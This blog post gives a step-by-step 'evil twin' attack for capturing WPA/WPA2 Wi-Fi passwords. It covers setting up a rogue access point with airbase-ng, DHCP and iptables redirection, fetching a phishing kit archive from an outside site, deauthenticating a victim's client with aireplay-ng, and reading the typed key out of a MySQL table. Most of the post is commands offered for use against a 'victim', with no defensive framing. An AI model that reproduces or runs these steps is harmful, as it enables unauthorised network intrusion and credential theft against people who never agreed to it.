Subscribe For Free Updates!

We'll not spam mate! We promise.

Saturday 20 December 2014

WPA/WPA2 Hacking [Evil Twin Method]

WPA/WPA2 Hacking [Evil Twin Method]

Note: UsE ONly Backtrack dhcp3 is Not Working On Kali Linux

No WPS Enable In Modem

Lets Start

Open a new console and type:

airodump-ng mon0
apt-get install dhcp3-server -y

Download These File And extract in Var Folder
http://hackthistv.com/eviltwin.zip

mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
gedit /etc/dhcp3/dhcpd.conf

Now you have to type this:

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.1 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.1.255;
option routers 192.168.1.2;
option domain-name-servers 8.8.8.8;
range 192.168.1.3 192.168.1.254;
}

Now continue back to console

airmon-ng stop mon0
airmon-ng stop wlan0
airmon-ng start wlan0 11
(11 is the channel)
airbase-ng -e "ESSID" -c 11 -a 
xxxxxxx mon0

Now open a new console and type:
ifconfig at0 up
ifconfig at0 192.168.1.2 netmask 255.255.255.0
route add -net 192.168.1.1 netmask 255.255.255.0 gw 192.168.1.2
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcp.pid at0
/etc/init.d/dhcp3-server start
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

Now open Wicd and go to preferences and check wireless interface in my case is wlan2...Now go back to console and type:

iptables --table nat --append POSTROUTING --out-interface wlan2 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

Now go to applications -> BackTrack -> Services -> HTTPD -> apache start
Also Now go to applications -> BackTrack -> Services -> MySQLD -> mysql start

Now go back to console and type:

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.1:80

[In my case is 192.168.1.1:80 you should find your router's ip(which you are changing your router's options)]

iptables -t nat -A PREROUTING -j MASQUERADE
clear
airodump-ng mon0
airodump-ng --bssid xxxxxxx -c 11 mon0
aireplay-ng -0 0 -a xxxxxxx -c xxxxxxx mon0

(First xxxxxxx is BSSID and the second xxxxxxx is STATION)

Now go to your PC(Victim) and you will see if you type whatever you want in the address bar you will see that nothing happens...then if you try to repair your network you will see "Successfully connected to XXXXXXX" and if you retry to search whatever you want on the internet you will see that you must re-enter your WPA or WPA2 key...
Now go back to BackTrack and stop the console in which the airbase-ng -e "ESSID" -c 11 -a xxxxxxx mon0 command was running and press CTRL+C to stop it and then type:
exit

Now go back to the other console and press CTRL+C to stop it and then type:
clear
mysql -u root -p
(you will see Enter password just skip it by pressing enter)
use wpa2
select * from content:
(you will see a small table copy the last line of key 2 this is the WPA2 Key)
Then go back to Wicd find the Network you were hacking and paste the WPA2 Key...And normally you will connect to the network...
 

Socializer Widget By Leakforums
SOCIALIZE IT →
FOLLOW US →
SHARE IT →
bloggerwidgets
Close [x]

2 comments:

 
Get Free Traffic PopAds.net - The Best Popunder Adnetwork